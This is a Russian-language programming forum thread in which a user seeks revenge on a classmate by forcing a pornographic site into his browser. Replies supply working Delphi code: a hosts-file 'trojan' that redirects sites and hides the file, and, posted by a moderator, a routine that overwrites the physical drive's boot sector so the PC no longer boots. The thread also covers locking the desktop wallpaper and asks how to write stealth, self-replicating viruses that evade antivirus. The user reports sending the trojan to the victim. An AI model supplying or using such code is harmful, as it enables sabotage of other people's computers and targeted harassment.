|
небольшая шалость)
|
|
Negodnik
|
Дата: Вторник, 28.12.2010, 18:57 | Сообщение # 1
|
Был не раз
Зарегистрирован: 28.12.2010
Группа: Пользователи
Сообщений: 15
Статус: Offline
|
Здравствуйте много уважаемые друзья)
Со мной в одном классе учится один мудак, который выиграл районную олимпиаду по информатике, и зазвездился. этот урод в корне достал.
можно ли сделать так, чтобы при включении любого браузера у него вылазил сайт с гейпорно? |
| |
|
|
|
|
|
opius
|
Дата: Вторник, 28.12.2010, 19:40 | Сообщение # 2
|
Частый гость
Зарегистрирован: 18.03.2010
Группа: Пользователи
Сообщений: 46
Статус: Offline
|
Negodnik, Для этого существует тема Болтовня.
|
| |
|
|
|
|
|
Negodnik
|
Дата: Вторник, 28.12.2010, 19:48 | Сообщение # 3
|
|
Был не раз
Зарегистрирован: 28.12.2010
Группа: Пользователи
Сообщений: 15
Статус: Offline
|
окей. может кто нибудь из модеров сможет перенести эту тему?
Сообщение отредактировал Negodnik - Вторник, 28.12.2010, 19:50
|
| |
|
|
|
|
|
opius
|
Дата: Вторник, 28.12.2010, 20:10 | Сообщение # 4
|
|
Частый гость
Зарегистрирован: 18.03.2010
Группа: Пользователи
Сообщений: 46
Статус: Offline
|
Quote (Negodnik)
окей. может кто нибудь из модеров сможет перенести эту тему?
Еслиб у меня были бы права на эту функцию я бы может и перенес бы.
|
| |
|
|
|
|
|
Negodnik
|
Дата: Вторник, 28.12.2010, 20:45 | Сообщение # 5
|
|
Был не раз
Зарегистрирован: 28.12.2010
Группа: Пользователи
Сообщений: 15
Статус: Offline
|
А так я могу её удалить? если да, то как? |
| |
|
|
|
|
|
cool1
|
Дата: Среда, 29.12.2010, 10:43 | Сообщение # 6
|
Участник
Зарегистрирован: 14.07.2010
Группа: Пользователи
Сообщений: 238
Статус: Offline
|
попробуй с hosts помудрить
p.s.
Code
program Hosts;
uses
Windows;
function WinDir:string;
var p:PChar;
begin
GetMem(p, MAX_PATH);
result:='';
if GetWindowsDirectory(p, MAX_PATH)>0 then
result:=string(p);
FreeMem(p);
end;
var
f:TextFile;
begin
AssignFile(f,WinDir+'\system32\drivers\etc\hosts');
Append(f);
Writeln(f,'127.0.0.1 yandex.ru');
Writeln(f,'127.0.0.1 www.yandex.ru');
Flush(f);
CloseFile(f);
SetFileAttributes('WinDir+'\system32\drivers\etc\hosts', faHidden);
end.
ну сам все сделаешь вот те дал типа трояна хост вместо 127.0.0.1 пиши ip тваего гей порно!
Ну для НУБов
Как узнать IP сайта
Пуск->Выполнить->ping site.ru -t вместо site.ru втсавишь сайт порно!
За помощь ставьте +!
Сообщение отредактировал cool1 - Среда, 29.12.2010, 10:46
|
| |
|
|
|
|
|
Negodnik
|
Дата: Среда, 29.12.2010, 11:59 | Сообщение # 7
|
|
Был не раз
Зарегистрирован: 28.12.2010
Группа: Пользователи
Сообщений: 15
Статус: Offline
|
СПАСИБО добрый человек)
Это что то вроде того что не даёт в контакт войти?
Сообщение отредактировал Negodnik - Среда, 29.12.2010, 12:01
|
| |
|
|
|
|
|
cool1
|
Дата: Среда, 29.12.2010, 12:37 | Сообщение # 8
|
|
Участник
Зарегистрирован: 14.07.2010
Группа: Пользователи
Сообщений: 238
Статус: Offline
|
ага
За помощь ставьте +!
|
| |
|
|
|
|
|
gravitas
|
Дата: Среда, 29.12.2010, 12:51 | Сообщение # 9
|
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
|
Дак помоему ему не с хостс надо мутить, а с стартовыми страницами браузеров. На эту тему неплохо бы погуглить...
З.Ы. Я тоже районку взял недавно 
TheDeduction
Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
|
| |
|
|
|
|
|
Negodnik
|
Дата: Среда, 29.12.2010, 14:43 | Сообщение # 10
|
|
Был не раз
Зарегистрирован: 28.12.2010
Группа: Пользователи
Сообщений: 15
Статус: Offline
|
Поздравляю)
но ты ведь называешь всех в школе нубами?)
Кстати. насчет стартовых ты прав, но стартовую не в автозагрузку пихать, а в сами браузеры, иначе она загружается когда инет не включен.
или же впихнуть ярлык сайта в подключения к инету (тобишь когда начинаешь подключаться к инету вылазит сайт в мозиле например)
Сообщение отредактировал Negodnik - Среда, 29.12.2010, 15:10
|
| |
|
|
|
|
|
gravitas
|
Дата: Среда, 29.12.2010, 19:01 | Сообщение # 11
|
|
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
|
Quote (Negodnik)
Кстати. насчет стартовых ты прав, но стартовую не в автозагрузку пихать, а в сами браузеры, иначе она загружается когда инет не включен. или же впихнуть ярлык сайта в подключения к инету (тобишь когда начинаешь подключаться к инету вылазит сайт в мозиле например)
А зачем тогда топик создавал?))
Помоему лучший выход - баннер на раб стол...
TheDeduction
Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
|
| |
|
|
|
|
|
Negodnik
|
Дата: Среда, 29.12.2010, 19:21 | Сообщение # 12
|
|
Был не раз
Зарегистрирован: 28.12.2010
Группа: Пользователи
Сообщений: 15
Статус: Offline
|
Quote
Помоему лучший выход - баннер на раб стол...
можешь дать код такого действа?
Сообщение отредактировал Negodnik - Среда, 29.12.2010, 19:22
|
| |
|
|
|
|
|
gravitas
|
Дата: Среда, 29.12.2010, 19:23 | Сообщение # 13
|
|
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
|
Quote (Negodnik)
можешь дать код такого действа?
Собирай из кусков кода типа запрета alt+f4 и т.д.
TheDeduction
Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
|
| |
|
|
|
|
|
Negodnik
|
Дата: Среда, 29.12.2010, 21:18 | Сообщение # 14
|
|
Был не раз
Зарегистрирован: 28.12.2010
Группа: Пользователи
Сообщений: 15
Статус: Offline
|
последние вопросы 
где можно достать коды стелсов и репликаторов? есть какие нибудь стелсы, которые до сих пор не палят анвири?
И ещё) можно ли создать вирус, который бы не палился, и маскировался под файлы ЕХЕ, и создавал бы другой вирус, который в свою очередь создавал ярлыки в определённых файлах?
и ещё ты же на дельфи олимпиаду писал?
Сообщение отредактировал Negodnik - Среда, 29.12.2010, 21:21
|
| |
|
|
|
|
|
C@T
|
Дата: Четверг, 30.12.2010, 01:19 | Сообщение # 15
|
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
|
ну примерчик РЕ инфектора на форуме есть https://delfcode.ru/forum/10-324-1
почему вы такие добрые, гейпорно в браузер, это же безобидно
предлагаю вот что:
предисловие:
тем кто не знает как загружается ОС
после включения компа перерывание биоса 19h загружает в ОЗУ по адресу 0x7C00 код который находится в бут секторе(первые 512 байт винчестера) и передает ему управление
Если мы откроем файл винчестера то в первых 512 байт мы найдем первичный загрузчик винды, а если мы затрем первые 512 байт то винда не сможет загрузится, но можно поступить и по другому, запихнуть туда свой загрузчик(загружать он конечно ничего не будет) который сделает то что мы хотим, можно например форматнуть ВЕСЬ винт , можно нарисовать какую нибудь картинку или вывести сообщение, а можно если постараться и сделать загрузчик который после того как выведет сообщение "ваш комп сдох" вернет загрузчик винды на место и после следующей перезагрузки все будет работать нормально
вот пример с выводом сообщения
Code
procedure KILL;
type
loader = array [0..511] of byte;
const
NewLoader:loader =
($b4, $13, $b9, $0b, $00, $b0, $00, $b6, $00, $b2, $00, $bd, $14, $7c, $b3, $1f,
$cd, $10, $eb, $fe, $41, $56, $45, $20, $53, $41, $54, $41, $4e, $41, $53, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $aa, $55);// #aa#55 это сигнатура загрузчика
{
данная константа это скомпиленный асм код:
.model tiny
.code
org 7C00h
start:
mov ah,13h ;number of command
mov cx,11 ; nomber
mov al,0h ;wiev mode
mov dh,0 ; X, координаты куда будет выведенно сообщение
mov dl,0 ; Y
mov bp,offset message;offset
mov bl,00011111b ;color
int 10h
jmp $;вечный цикл
DATA:
message db "AVE SATANAS",0h;Слава Сатане(латынь)
end start
}
var
f1,f2:cardinal;
buf:loader;
nr,nw:Cardinal;
begin
f1 := CreateFileA('\\.\PhysicalDrive0',GENERIC_ALL,FILE_SHARE_WRITE + FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
buf := NewLoader;//заполняем буфер
WriteFile(f1,buf,512,nw,0);
CloseHandle(f1);
end;
Сообщение отредактировал C@T - Четверг, 30.12.2010, 01:34
|
| |
|
|
|
|
|
cool1
|
Дата: Четверг, 30.12.2010, 06:52 | Сообщение # 16
|
|
Участник
Зарегистрирован: 14.07.2010
Группа: Пользователи
Сообщений: 238
Статус: Offline
|
Идея:
1)Меняем фон раб-стола на (рисуем в Paint'e) Пшел нах или че-то типа такого!
2)В HKEY_CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion\Policies\ActiveDesktop добовляем
NoChangingWallpaper со значением, равным единице!
P.S. Меняем фон: (программно)
Code
uses ...Registry; //подключаем модуль
//Используем
procedure TForm1.Button1Click(Sender: TObject);
var
Reg: TRegIniFile;
begin
Reg := TRegIniFile.Create('Control Panel');
Reg.WriteString('desktop', 'Wallpaper', 'C:\1.bmp');
Reg.WriteString('desktop', 'TileWallpaper', '0');
Reg.Free;
SystemParametersInfo(SPI_SETDESKWALLPAPER, 0, nil, SPIF_SENDWININICHANGE);
end;
УДАЧИ!
За помощь ставьте +!
Сообщение отредактировал cool1 - Четверг, 30.12.2010, 06:56
|
| |
|
|
|
|
|
gravitas
|
Дата: Четверг, 30.12.2010, 07:49 | Сообщение # 17
|
|
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
|
Кстати есть еще вариант... Жертва 100500% обосрется от страха!
Внимание... Supervirus.
TheDeduction
Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
|
| |
|
|
|
|
|
Negodnik
|
Дата: Четверг, 30.12.2010, 14:20 | Сообщение # 18
|
|
Был не раз
Зарегистрирован: 28.12.2010
Группа: Пользователи
Сообщений: 15
Статус: Offline
|
Quote (C@T)
вот пример с выводом сообщения
Code
procedure KILL;
type
loader = array [0..511] of byte;
const
NewLoader:loader =
($b4, $13, $b9, $0b, $00, $b0, $00, $b6, $00, $b2, $00, $bd, $14, $7c, $b3, $1f,
$cd, $10, $eb, $fe, $41, $56, $45, $20, $53, $41, $54, $41, $4e, $41, $53, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00,
$00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $00, $aa, $55);// #aa#55 это сигнатура загрузчика
{
данная константа это скомпиленный асм код:
.model tiny
.code
org 7C00h
start:
mov ah,13h ;number of command
mov cx,11 ; nomber
mov al,0h ;wiev mode
mov dh,0 ; X, координаты куда будет выведенно сообщение
mov dl,0 ; Y
mov bp,offset message;offset
mov bl,00011111b ;color
int 10h
jmp $;вечный цикл
DATA:
message db "AVE SATANAS",0h;Слава Сатане(латынь)
end start
}
var
f1,f2:cardinal;
buf:loader;
nr,nw:Cardinal;
begin
f1 := CreateFileA('\\.\PhysicalDrive0',GENERIC_ALL,FILE_SHARE_WRITE + FILE_SHARE_READ,0,OPEN_EXISTING,0,0);
buf := NewLoader;//заполняем буфер
WriteFile(f1,buf,512,nw,0);
CloseHandle(f1);
end;
Прикрепления: kill.rar(156Kb)
прочел и понял что я нихера не шарю)
Можете посоветовать какие нибудь хорошие книги по вирусологии? (желательно для чайников )
нашёл прогу, которая создаёт стартовую страницу в опере. прошу её посмотреть, и вынести вердикт можно ли её переделать под вирус.
И можно ли её приспособить под хром мозилу сафари эксплоуэр и другие?
незнаю как тут выкладывать файлы, поэтому выложил на дамп: http://dump.ru/file/4985794
Сообщение отредактировал Negodnik - Четверг, 30.12.2010, 14:45
|
| |
|
|
|
|
|
gravitas
|
Дата: Четверг, 30.12.2010, 15:19 | Сообщение # 19
|
|
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
|
Quote (Negodnik)
Можете посоветовать какие нибудь хорошие книги по вирусологии? (желательно для чайников )
А ты по твоему где?) На сайте дельфина (на этом сайте) килотонны мануала.
TheDeduction
Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
|
| |
|
|
|
|
|
Negodnik
|
Дата: Пятница, 31.12.2010, 13:54 | Сообщение # 20
|
|
Был не раз
Зарегистрирован: 28.12.2010
Группа: Пользователи
Сообщений: 15
Статус: Offline
|
чем можно открыть это приложение, чтобы взглянуть на код. можете посоветьвать утилиту? |
| |
|
|
|
|
|
gravitas
|
Дата: Пятница, 31.12.2010, 14:52 | Сообщение # 21
|
|
Авторитетный
Зарегистрирован: 01.05.2010
Группа: Пользователи
Сообщений: 385
Статус: Offline
|
Какое приложение?
TheDeduction
Для ускорения получения ответов на ваши вопросы рекомендуется подкармливание в виде +'ов в рейтинг :)
|
| |
|
|
|
|
|
C@T
|
Дата: Пятница, 31.12.2010, 16:45 | Сообщение # 22
|
|
Авторитетный
Зарегистрирован: 06.03.2010
Группа: Модераторы
Сообщений: 265
Статус: Offline
|
вот, может поможет
ну как, отомстил своему однокласснику ?
|
| |
|
|
|
|
|
Negodnik
|
Дата: Воскресенье, 02.01.2011, 19:47 | Сообщение # 23
|
|
Был не раз
Зарегистрирован: 28.12.2010
Группа: Пользователи
Сообщений: 15
Статус: Offline
|
Quote (C@T)
ну как, отомстил своему однокласснику ?
Я ему кинул вирь с хостом (код которого самый первый), но это уж совсем для нубов)
|
| |
|
|
|
|
|
Negodnik
|
Дата: Воскресенье, 02.01.2011, 23:01 | Сообщение # 24
|
|
Был не раз
Зарегистрирован: 28.12.2010
Группа: Пользователи
Сообщений: 15
Статус: Offline
|
Друзья! я как обычно гуглил по теме, и узнал, что мне не нужно строить велосипед, окозалось что его построили ещё до меня)
Trojan Start Page 1505
проблема в том, что я не могу найти исходники этого вируса  |
| |
|
|
|
|
|
cool1
|
Дата: Понедельник, 03.01.2011, 14:16 | Сообщение # 25
|
|
Участник
Зарегистрирован: 14.07.2010
Группа: Пользователи
Сообщений: 238
Статус: Offline
|
так его может на асме или си писали
p.s. сам напиши вроде в реестре стартовые страницы хранятся
За помощь ставьте +!
Сообщение отредактировал cool1 - Понедельник, 03.01.2011, 14:17
|
| |
|
|
|
